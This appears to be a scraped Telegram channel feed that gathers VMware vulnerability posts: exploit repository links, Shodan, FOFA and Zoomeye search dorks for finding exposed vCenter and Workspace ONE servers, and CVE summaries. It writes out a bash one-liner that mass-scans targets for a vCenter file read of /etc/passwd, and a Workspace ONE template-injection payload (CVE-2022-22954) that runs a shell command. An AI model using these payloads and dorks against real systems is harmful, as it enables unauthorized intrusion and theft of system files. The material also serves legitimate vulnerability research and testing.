VMware Exploitation
A collection of links related to VMware escape exploit
https://github.com/xairy/vmware-exploitation
#vmware
A collection of links related to VMware escape exploit
https://github.com/xairy/vmware-exploitation
#vmware
GitHub
GitHub - xairy/vmware-exploitation: A collection of links related to VMware escape exploits
A collection of links related to VMware escape exploits - xairy/vmware-exploitation
VMware vCenter (7.0.2.00100) — File Read + SSRF + XSS
Zoomeye Dorks:
#vmware #vcenter #bugbounty
cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";done
Shodan Dorks:http.title:"ID_VC_Welcome"
Zoomeye Dorks:
app:"VMware vCenter"
https://github.com/l0ggg/VMware_vCenter#vmware #vcenter #bugbounty
Log4jHorizon
A proof of concept for VMWare Horizon instances and allows attackers to execute code as an unauthenticated user using a single HTTP request.
Research:
https://www.sprocketsecurity.com/blog/crossing-the-log4j-horizon-a-vulnerability-with-no-return
Exploit:
https://github.com/puzzlepeaches/Log4jHorizon
#log4j #vmware #horizon #rce
A proof of concept for VMWare Horizon instances and allows attackers to execute code as an unauthenticated user using a single HTTP request.
Research:
https://www.sprocketsecurity.com/blog/crossing-the-log4j-horizon-a-vulnerability-with-no-return
Exploit:
https://github.com/puzzlepeaches/Log4jHorizon
#log4j #vmware #horizon #rce
👍3
VMware Workspace ONE — SSTI (CVE-2022-22954)
Successful exploitation could lead to RCE from an unauthenticated user.
Payload:
https://github.com/bewhale/CVE-2022-22954
Shodan Dork:
Successful exploitation could lead to RCE from an unauthenticated user.
Payload:
https://victim/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}
Exploit:https://github.com/bewhale/CVE-2022-22954
Shodan Dork:
http.favicon.hash:-1250474341
#vmware #workspace #ssti #cveThis media is not supported in your browser
VIEW IN TELEGRAM
🔥 VMware vRealize Network Insight — Pre-authenticated RCE (CVE-2023-20887)
This post will examine the exploitation process of CVE-2023-20887 in VMware Aria Operations for Networks (formerly known as vRealize Network Insight). This vulnerability comprises a chain of two issues leading to Remote Code Execution (RCE) that can be exploited by unauthenticated attackers.
Exploit:
https://github.com/sinsinology/CVE-2023-20887
Research:
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/
#VMware #vRealize #rce #cve
This post will examine the exploitation process of CVE-2023-20887 in VMware Aria Operations for Networks (formerly known as vRealize Network Insight). This vulnerability comprises a chain of two issues leading to Remote Code Execution (RCE) that can be exploited by unauthenticated attackers.
Exploit:
https://github.com/sinsinology/CVE-2023-20887
Research:
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/
#VMware #vRealize #rce #cve
🔥3
🔥 VMware vCenter Server RCE + PrivEsc
Multiple heap-overflow vulnerabilities in the implementation of the DCE/RPC protocol. They could allow a bad actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted network packet.
— CVE-2024-37079: A heap-overflow vulnerability in the DCERPC protocol implementation of vCenter Server that allows a malicious actor with network access to send specially crafted packets, potentially leading to remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37080: Another heap overflow vulnerability in the DCERPC protocol of vCenter Server. Similar to CVE-2024-37079, it allows an attacker with network access to exploit heap overflow by sending crafted packets, potentially resulting in remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37081: This vulnerability arises from a misconfiguration of sudo in vCenter Server, permitting an authenticated local user to exploit this flaw to elevate their privileges to root on the vCenter Server Appliance. (CVSS v3.1 score: 7.8 "high").
Nuclei Template (PoC):
🔗 https://gist.github.com/tothi/0ff034b254aca527c3a1283ff854592a
Shodan
FOFA
#vmware #vcenter #rce #lpe #cve
Multiple heap-overflow vulnerabilities in the implementation of the DCE/RPC protocol. They could allow a bad actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted network packet.
— CVE-2024-37079: A heap-overflow vulnerability in the DCERPC protocol implementation of vCenter Server that allows a malicious actor with network access to send specially crafted packets, potentially leading to remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37080: Another heap overflow vulnerability in the DCERPC protocol of vCenter Server. Similar to CVE-2024-37079, it allows an attacker with network access to exploit heap overflow by sending crafted packets, potentially resulting in remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37081: This vulnerability arises from a misconfiguration of sudo in vCenter Server, permitting an authenticated local user to exploit this flaw to elevate their privileges to root on the vCenter Server Appliance. (CVSS v3.1 score: 7.8 "high").
Nuclei Template (PoC):
🔗 https://gist.github.com/tothi/0ff034b254aca527c3a1283ff854592a
Shodan
product:"VMware vCenter Server"
FOFA
app="vmware-vCenter"
#vmware #vcenter #rce #lpe #cve
🔥12👍3
APT
🔥 VMware vCenter Server RCE + PrivEsc Multiple heap-overflow vulnerabilities in the implementation of the DCE/RPC protocol. They could allow a bad actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted…
VMware vCenter - CVE-2024-37081.pdf
1.3 MB
The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo. An authenticated local user with non-administrative privileges may exploit these issues to elevate privileges to root on vCenter Server Appliance.
🔗 Source:
https://github.com/mbadanoiu/CVE-2024-37081
#vmware #vcenter #lpe #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🔥3❤1
VMware vCenter - CVE-2024-22274.pdf
1.1 MB
The vCenter Server contains an authenticated remote code execution vulnerability. A malicious actor with administrative privileges on the vCenter appliance shell may exploit this issue to run arbitrary commands on the underlying operating system as the "root" user.
🔗 Source:
https://github.com/mbadanoiu/CVE-2024-22274
https://github.com/l0n3m4n/CVE-2024-22274-RCE
#vmware #vcenter #rce #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍3❤2